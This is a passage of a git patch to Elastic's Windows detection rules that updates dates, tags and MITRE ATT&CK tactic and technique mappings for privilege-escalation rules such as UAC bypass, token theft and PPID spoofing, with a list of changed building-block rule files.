"https://attack.mitre.org/techniques/T1559/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml index cc5a3e44aa3..beff616928a 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -59,19 +59,7 @@ The ICMLuaUtil Elevated COM Interface is a Windows component that facilitates Us risk_score = 73 rule_id = "68d56fdc-7ffa-4419-8e95-81641bd6f845" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -85,53 +73,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" -[[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml index 8763bfd5251..b02c911f5c6 100644 --- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,22 +64,7 @@ User Account Control (UAC) is a security feature in Windows that helps prevent u risk_score = 47 rule_id = "1dcc51f6-ba26-49e7-9ef4-2655abb2361e" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,53 +86,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml index db0e8042ad4..993c7e84c77 100644 --- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml +++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,46 +92,46 @@ file where host.os.type == "windows" and event.type : "change" and process.name [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml index c9cd1c4a1bb..96e8ff9eab2 100644 --- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -144,36 +144,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml index 8752086e4ee..3edafaea26b 100644 --- a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml +++ b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -134,46 +134,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml index fa2fd7c192b..92ec3ed3c71 100644 --- a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -132,46 +132,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml index 4a8e99f0049..1475fa06cf2 100644 --- a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml +++ b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/06/05" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -109,20 +109,7 @@ references = [ risk_score = 47 rule_id = "35df0dd8-092d-4a83-88c1-5151a804f31b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -162,19 +149,18 @@ process.parent.name != null and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml index 5205c3c67f0..a2222b42bc5 100644 --- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml +++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,36 +110,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.012" -name = "Process Hollowing" -reference = "https://attack.mitre.org/techniques/T1055/012/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_via_ppid_spoofing.toml b/rules/windows/privilege_escalation_via_ppid_spoofing.toml index 35699123c49..320714b320d 100644 --- a/rules/windows/privilege_escalation_via_ppid_spoofing.toml +++ b/rules/windows/privilege_escalation_via_ppid_spoofing.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -136,24 +136,18 @@ Parent Process ID (PPID) spoofing is a technique where adversaries manipulate th [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [[rule.threat.technique.subtechnique]] id = "T1134.004" name = "Parent PID Spoofing" reference = "https://attack.mitre.org/techniques/T1134/004/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml index cb89a43db4b..bcceba7f00e 100644 --- a/rules/windows/privilege_escalation_via_rogue_named_pipe.toml +++ b/rules/windows/privilege_escalation_via_rogue_named_pipe.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/13" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,14 +93,18 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_via_token_theft.toml b/rules/windows/privilege_escalation_via_token_theft.toml index d6c46d38039..57d314c6ce0 100644 --- a/rules/windows/privilege_escalation_via_token_theft.toml +++ b/rules/windows/privilege_escalation_via_token_theft.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -22,14 +22,7 @@ references = [ risk_score = 73 rule_id = "02a23ee7-c8f8-4701-b99d-e9038ce313cb" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -149,19 +142,36 @@ In Windows environments, processes can be created with elevated tokens to perfor [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" + +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml index 5bbc32c2c97..906baeca97c 100644 --- a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml +++ b/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/07" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,14 +76,7 @@ Audit Security System Extension (Success) ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -109,19 +102,36 @@ configuration where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - From b2952ba8d8bd9fb34e9fe9618df9693a6f0d4c99 Mon Sep 17 00:00:00 2001 From: Mika Ayenson Date: Mon, 23 Mar 2026 16:57:32 -0500 Subject: [PATCH 03/16] add updated rules_building_block with tags/mitre mappings --- ...collection_archive_data_zip_imageload.toml | 8 ++- ...ction_common_compressed_archived_file.toml | 47 +------------ ...llection_microsoft_purview_dlp_signal.toml | 23 ++++++- ...microsoft_purview_insider_risk_signal.toml | 23 +------ .../collection_posh_compression.toml | 30 ++++----- ...ommand_and_control_bitsadmin_activity.toml | 30 ++------- ...llama_model_download_untrusted_source.toml | 43 +++++++----- ...access_entra_id_risk_detection_signal.toml | 30 +-------- ...ntial_access_iis_apppoolsa_pwd_appcmd.toml | 14 ++-- ...al_access_mdmp_file_unusual_extension.toml | 32 +-------- .../defense_evasion_dll_hijack.toml | 10 +-- ...evasion_dotnet_clickonce_dfsvc_netcon.toml | 16 ++--- ...fense_evasion_download_susp_extension.toml | 47 ++++--------- ...cution_via_visualstudio_prebuildevent.toml | 18 +++-- .../defense_evasion_generic_deletion.toml | 10 ++- ...fense_evasion_injection_from_msoffice.toml | 59 +++++------------ ...defense_evasion_masquerading_browsers.toml | 29 ++------ .../defense_evasion_masquerading_vlc_dll.toml | 29 ++------ ...ense_evasion_masquerading_windows_dll.toml | 34 ++-------- ...ion_masquerading_windows_system32_exe.toml | 29 ++------ ...soft_security_compliance_admin_signal.toml | 43 +++++++----- ...fense_evasion_msdt_suspicious_diagcab.toml | 32 +++++---- ...ense_evasion_outlook_suspicious_child.toml | 52 +++------------ ..._obfuscation_proportion_special_chars.toml | 30 ++------- ..._evasion_powershell_clear_logs_script.toml | 24 +------ ...nse_evasion_service_disabled_registry.toml | 25 ++++--- ...defense_evasion_service_path_registry.toml | 33 ++-------- .../defense_evasion_services_exe_path.toml | 34 ++-------- .../defense_evasion_unsigned_bits_client.toml | 13 +--- .../defense_evasion_write_dac_access.toml | 42 ++++++------ .../discovery_capnetraw_capability.toml | 25 ++++--- .../discovery_generic_account_groups.toml | 14 ++-- ...ry_kernel_module_enumeration_via_proc.toml | 9 ++- ...ubectl_workload_and_cluster_discovery.toml | 12 ++-- .../discovery_linux_modprobe_enumeration.toml | 44 +++++++++---- .../discovery_linux_sysctl_enumeration.toml | 30 +++++---- ...ery_linux_system_owner_user_discovery.toml | 8 ++- .../discovery_net_share_discovery_winlog.toml | 27 +------- rules_building_block/discovery_net_view.toml | 29 +------- .../discovery_of_domain_groups.toml | 8 ++- .../discovery_posh_generic.toml | 57 +++++----------- .../discovery_posh_password_policy.toml | 33 +--------- ..._post_exploitation_external_ip_lookup.toml | 12 +--- ...ery_potential_memory_seeking_activity.toml | 14 +--- ...y_process_discovery_via_builtin_tools.toml | 13 +--- ...ote_system_discovery_commands_windows.toml | 13 +++- .../discovery_security_software_wmic.toml | 19 +----- ...discovery_suspicious_proc_enumeration.toml | 10 +-- .../discovery_system_network_connections.toml | 8 ++- .../discovery_system_service_discovery.toml | 8 ++- .../discovery_win_network_connections.toml | 19 ++++-- ...d_identity_protection_risk_detections.toml | 48 ++++++++++---- ...execution_aws_lambda_function_updated.toml | 31 +++++---- ...ution_github_new_event_action_for_pat.toml | 29 ++++---- ...n_github_new_repo_interaction_for_pat.toml | 29 ++++---- ..._github_new_repo_interaction_for_user.toml | 29 ++++---- .../execution_github_repo_created.toml | 29 ++++---- ...n_github_repo_interaction_from_new_ip.toml | 29 ++++---- .../execution_linux_segfault.toml | 10 +-- .../execution_mcp_server_child_process.toml | 16 ++++- ...ution_settingcontent_ms_file_creation.toml | 48 +++++--------- ...execution_unsigned_service_executable.toml | 34 ++-------- .../impact_github_pat_access_revoked.toml | 15 +---- ...ss_anomalous_rsc_flight_data_patterns.toml | 28 ++++---- ..._access_github_new_ip_address_for_pat.toml | 34 ++++++---- ...ss_microsoft_air_investigation_signal.toml | 26 +------- ...cess_microsoft_defender_alerts_signal.toml | 23 +------ ...t_defender_threat_intelligence_signal.toml | 32 +-------- ...ft_purview_security_compliance_signal.toml | 38 +---------- ...cess_new_okta_authentication_behavior.toml | 13 +++- ...cess_okta_admin_console_login_failure.toml | 26 +------- rules_building_block/lateral_movement_at.toml | 44 +++++-------- .../lateral_movement_posh_winrm_activity.toml | 38 +++++------ ...movement_unusual_process_sql_accounts.toml | 32 ++++----- .../lateral_movement_wmic_remote.toml | 48 ++++++-------- ...e_aws_iam_login_profile_added_to_user.toml | 21 ++---- .../persistence_github_new_pat_for_user.toml | 34 ++++------ ...github_new_user_added_to_organization.toml | 13 ++-- ...e_iam_instance_request_to_iam_service.toml | 31 +++++---- .../persistence_startup_folder_lnk.toml | 12 +--- .../persistence_transport_agent_exchange.toml | 24 +------ ...ce_web_server_potential_sql_injection.toml | 66 +++---------------- ...sistence_web_server_sus_file_creation.toml | 44 +------------ ..._escalation_sts_getsessiontoken_abuse.toml | 35 ++-------- 84 files changed, 775 insertions(+), 1535 deletions(-) diff --git a/rules_building_block/collection_archive_data_zip_imageload.toml b/rules_building_block/collection_archive_data_zip_imageload.toml index 445af055e36..8b65f51a63a 100644 --- a/rules_building_block/collection_archive_data_zip_imageload.toml +++ b/rules_building_block/collection_archive_data_zip_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,14 +56,18 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" + 